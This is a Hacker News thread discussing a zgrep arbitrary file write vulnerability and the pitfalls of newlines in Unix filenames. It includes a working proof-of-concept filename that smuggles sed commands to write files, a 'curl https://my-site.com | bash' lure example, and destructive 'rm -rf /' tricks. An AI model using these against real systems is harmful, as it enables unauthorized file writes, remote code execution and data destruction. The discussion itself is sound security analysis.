Hacker News new | past | comments | ask | show | jobs | submit login
Arbitrary file write vulnerability in GNU gzip's zgrep utility (redhat.com)
152 points by perihelions on April 18, 2022 | hide | past | favorite | 77 comments



The commit fixing this bug is here: https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740...

while grep is written in C, zgrep is written in posix sh, and the bug was from using sed to escape arguments, and sed being a line-oriented utility that is non-ideal for operating on newline-containing strings (i.e. linux filenames).


The thought of writing anything in sh is horrifying to me.


Check out GNU pass

It's like all sh


I didn't know pass was "GNU". I also recall it being pretty well written.


Original author of password-store was Jason Donenfeld (of Wireguard fame), and it was indeed well-written.


Yes! Actually I remember now being surprised to find out Jason had written it. His git repository is full of neat and interesting projects.


Pass is a wrapper script around git and gpg. You can get the functionality of `pass` by running git and gpg commands directly.

Learning git itself is non-intuitive, but the gpg utilities take the learning curve to a whole other level. If you want to make simple use of the gpg utilities, you should plan on setting aside a few full days to learn how they work. Or just use pass, which additionally leverages git for password history.


bash, actually.


This reminds me that filenames can contain newlines.


They can contain any octet except ASCII NUL and /.

That said, pretty much every filesystem's on-disk format has an explicit length field for file names. So in theory, there's nothing stopping them from supporting completely binary filenames - it's the kernel's VFS layer that treats NUL and / as special.


D:


And nulls :)


How exactly can they contain nulls?

fopen() takes a null-terminated filename, so if there is a null byte in the middle it would just truncate the filename.


that might be a corrupt filename that can be opened only by its inode in debugfs or similar.


No they can’t.


Well, this seems like the sort of error that we've all made when throwing together our own personal scripts, so I guess it is somewhat heartening that the serious Redhat folks would make it too.


It always seemed very strange to me that there is no way to generate escaped representations in sh/bash, because you do need that from time to time.


There is printf %q, a bashism I think

Sample usage to escape var called v v="$(printf '%q' "$v")"


This is called ANSI-C quoting[1], and I am surprised it is not more popular, because I think it provides a good compromise with readability and power.

I used it myself when I wrote a script that generates a self executing bash script to restore mtimes for directories[2]

[1]: https://www.gnu.org/software/bash/manual/bash.html#ANSI_002d...

[2]: https://github.com/unqueued/storetouch


Thanks!


This one's pretty cool, example below per gzip-1.12/tests/zgrep-abuse:

  timdoug@box:~/gzip$ ls
  timdoug@box:~/gzip$ touch z
  timdoug@box:~/gzip$ echo test | gzip > 'z|
  p
  1s|.*|chosen-content|
  1w hacked
  etouch .\x2fhacked2
  d
  #
  #'
  timdoug@box:~/gzip$ zgrep test z*
  ztest
  timdoug@box:~/gzip$ ls hack*
  hacked  hacked2
  timdoug@box:~/gzip$ cat hacked
  chosen-content
  timdoug@box:~/gzip$


Thanks for this! Simple enough to type out even.


My epiphany was using find | xargs and realizing I need -print0 for the former and -0 for the latter to handle special characters. Then I realized all my previous bash scripts were WRONG...


Zero-delimited versions of common bash tools/idioms:

  xargs -0

  find ... -print0

  sort -z

  while IFS= read -r -d '' var; do ...; done

  env -0

  printf -- '%s\0' *


Don't you mean ascii null, not zero?


Don't you mean NUL, not null?


Is there any real use case of having filenames with newlines? Everytime I recall that we have to design programs around that I wonder why it's possible in the first place.


The only invalid character in a path is \0 (which of course would terminate the string immediately), and a particular filename cannot contain /, or be "." or "..". Doesn't even have to be unicode. Literally any other bytes.


Linux even allows filenames with end-of-transmission characters in them, which is a choice I'd question long before I start questioning newlines!


EOT or ctrl-D only has significance when typed into a tty. Once it has turned into a character it is as harmless as any other byte value, it doesn't end anything by itself.


Doesn't the article show that newline isn't harmless at all?

Of course EOT doesn't end anything by itself, nor does 0x0a end a line by itself -- all that happens through code that interprets those characters in a particular way, so talking about the "danger" of a character in absence of any code that operates on it is meaningless. In the presence of code, on the other hand, "harmless" in the extreme sense means "there exists no code that will act up when presented this character", which the article shows to be wrong.


I'm aware, but it nevertheless doesn't make any sense to have it in a file name.


I'm just saying that it makes exactly as much sense as ctrl-E or any other control char, it has no special status.


There are quite a few ASCII control characters [1] that could make more sense than EOT, e.g., \t, \n, \e, etc.

But yes, EOT is not the only nonsensical character that you could put in a file name, and I never claimed such.

[1] https://en.wikipedia.org/wiki/Control_character#In_ASCII


I think it is good that it is so flexible, because you never know what kind of data you may want represented on your filesystem. I would rather that there be as few restrictions as possible.

There are cases where you will encounter lots of nasty filenames, especially if you are handling user generated content, like scraping from YouTube or Instagram.


Makes things like UTF8 and other new encodings easier. Everything has to support that nearly anything can be in a filename


It doesn't directly help UTF8, since all the bytes it uses for encoding non-ASCII have the high bit set.

It might directly help with UTF16, I'm not sure.

But the general idea of "block only a few specific characters (\0 and /) and allow all the rest" does help with UTF8. If the designers said something like "only ASCII letters and number and dashes and underscores" then that would block UTF8, and we might end up with something like URL hostnames, where you use punycode to encode non-ASCII into ASCII.


The point is that unix behaviour is to treat filenames as byte strings, so no particular encoding is mandated by the kernel or by most tools. That made the transition to utf-8 fairly painless.


So it's easier to write insecure software. Wrong priorities.


> easier to write insecure software.

Not filtering untrusted inputs, and not escaping or handling them correctly is how you write insecure software. Arbitrary input guarantees (unless very strict, then that's indirectly filtering inputs anyways) don't change that.


Why does that make it easier to write insecure software? Which is easier: dealing with bytes, only 2 of which have special meanings (/ and \0) or dealing with a ton of different character classes, each of which you have to think about and code for. The second case happened with URLs, so there's all sorts of weird rules about you can have a ? in this section but not that section, and percent encoding and punycode and stuff like that.


A very odd coincidence that just a few hours ago there was another news about a 0day in another de/compressor: https://news.ycombinator.com/item?id=31070256


Rarely am I a commenter of so few words but, here be dragons.


"This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names."

Perhaps I don't get this because I have used Windows most of my life (and DOS before that) but is it valid to have newline characters in a Unix/Linux filename?


Unix filesystems can typically have filenames containing any bytes except "\0" and "/".

I believe you can also have newline characters in NTFS, although Windows Explorer appears to prevent creating a file with them.


I have been using the filename "meeting-notes:10/1 \n Unix & Windows.txt" to test various apps. It tends to expose just how brittle modern computing still is.


I made a whole collection: https://github.com/benibela/nasty-files


"--no-preserve-root" made me laugh. for testing unescaped calls to rm?


It's a bypass against a mitigation for an old trick which worked back in the day where you could watch someone self-nuke themselves off of IRC by convincing them to type rm -rf /


It is to mess with people calling rm * / in the directory

Good thing there is not really any reason to call rm like that


oh does that actually work? the * expanding a filename to an argument? I guess it all just ends up in argv


Oh cool! I use nasty-files as a submodule with some of my tests. I can't believe how long I went without without testing against the filename corner cases.

I've found so much software that doesn't properly handle nasty filenames, I think it should be tested for more.


Lol that broke git for me


There are no rules about what can be in a filename except they can't contain \0 or / as a matter of practice because the kernel interprets these as end of string and path element separator, respectively.


For even more fun NTFS filenames can actually have newlines in them if you access them with \\?\.


Good to know. :)

Another "queer" naming issue in Windows (JFYI), backslash and ALT+0160:

https://msfn.org/board/topic/131103-win_nt~bt-can-be-omitted...


https://superuser.com/questions/129519/which-file-systems-su...

So yea, it looks like that linux filesystems accept this, but a lot of utilities break.


This doesn't even seem like a legitimate security vulnerability at all, just a generic behavior bug. I'm guessing there are countless bugs like this in a common Linux userland.

I'd argue that the security vulnerability only exist in any program which passes untrusted user input to zgrep, which would be an obviously insecure thing to do.

Unless zgrep claims its safe against untrusted user input? But that would be weird and surprising.


16 years ago, there was a bug reported to zgrep where files with 1 newline caused it to behave incorrectly. It was patched without a CVE https://git.savannah.gnu.org/cgit/gzip.git/commit/zgrep.in?i...

This year, there was a bug reported to zgrep where files with 2 newlines caused it to behave incorrectly. It got a CVE and a front page hacker news post.

I give it very good odds this vulnerability has seen next to zero exploitation in the wild in either of the two cases above.


So we’re 16 years out from the three new line bug.



When is this actually exploitable? Are there any common programs or setups that result in zgrep getting called on attacker-provided filenames?


The exploit would have to be a bit contrived.

There aren't, to my knowledge, common programs or setups that would cause this to matter.

This would probably be used for social engineering at best, where the attacker convinces a victim to "hey, git clone my repo, and then run zgrep "bad string" * for some contrived reason"

Someone who's trying to assist someone else on discord or whatever probably won't consider running "zgrep" in an attacker controlled directory dangerous, so they might do it, while if the attacker said "I need help, curl https://my-site.com | bash to repro", the victim would absolutely not do it.


> while if the attacker said "I need help, curl https://my-site.com | bash to repro", the victim would absolutely not do it.

You’d be surprised. I wrote a Postfix tutorial ages ago and left my real email address in the To: of an example test email. I subsequently got a lot of emails from root@s with the exact same title and body over the years. Too many people copy paste anything labeled as instruction without a second thought.


The thing i don't get is the statement "Attack Vector Network" in the advisory as well at the statement it allows a remote attacker to write files.

I don't understand the bar to be called a Network Attack Vector. Surely there's more to this than asking the user to run shell commands right?


It sounds like if a web service allowed a user to upload a file with attacker-chosen filename, which it will then run zgrep on, it would be vulnerable.

Perhaps that's why?


That's actually the suggested installation mechanism for a lot of software. Most recent I can think of were some AWS cli tools, as delivered from AWS. Height of irresponsibility imo.


Given infinite code, yes. I would imagine exploitability would be rare, but that it’s easier to fix the vulnerability and move on rather than care about whether or not things are affected.


Why does a search tool even need to open a writable file handle?


It's for searching inside of compressed files, and does this by decompressing to a temporary directory.


… that is also shocking… it wouldn't just stream the decompression, perhaps piping the decompressed stream into grep itself?


zgrep does stream directly from gzip into grep.

You can see that here: https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=...

It's also mentioned in one of the few comments in zgrep: https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=...

> we use stdin to pass the gzip output to grep

zgrep does create a temporary directory to store the grep search pattern, but only if the pattern is passed via `zgrep -f`, and only if the pattern passed in is not a regular file (i.e. `zgrep -f <(echo "foo") some_file.gz` would create a temporary file with the contents "foo", not with the contents of some_file.gz, and `zgrep -f pattern_file search_file.gz` would not create any temporary file)


.


I'm sure there's a lot of linux closed source utilities that will break in the same or worse manners. The problem will never be found there.

The issue with finding flaws in source is it takes a massive amount of logical thought about what inputs are possible. For example a new line is valid in a linux file name, but I've never legitimately used one, or do I believe I've even seen one in the last 25 years of using Linux.


> For example a new line is valid in a linux file name, but I've never legitimately used one, or do I believe I've even seen one in the last 25 years of using Linux.

Likewise. I wonder if SELinux or AppArmor or the like allows setting a policy for valid filenames to create. E.g. no newlines, only valid UTF-8, only printable characters.


I’d like to see a flag somewhere to enable this. Perhaps it is a filesystem flag, similar to case-sensitivity.


I've seen them (specifically, filenames generated from values in a "modern" configuration language - json or yaml - that mistakenly had newlines in them.) Fortunately, most of the shell tools involved used `-print0` and the related options anyway (because once you have humans involved, it's the easy way to handle normal spaces in names) and the things that did break, where only "some low-value data processing got skipped" rather than anything harmful.




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: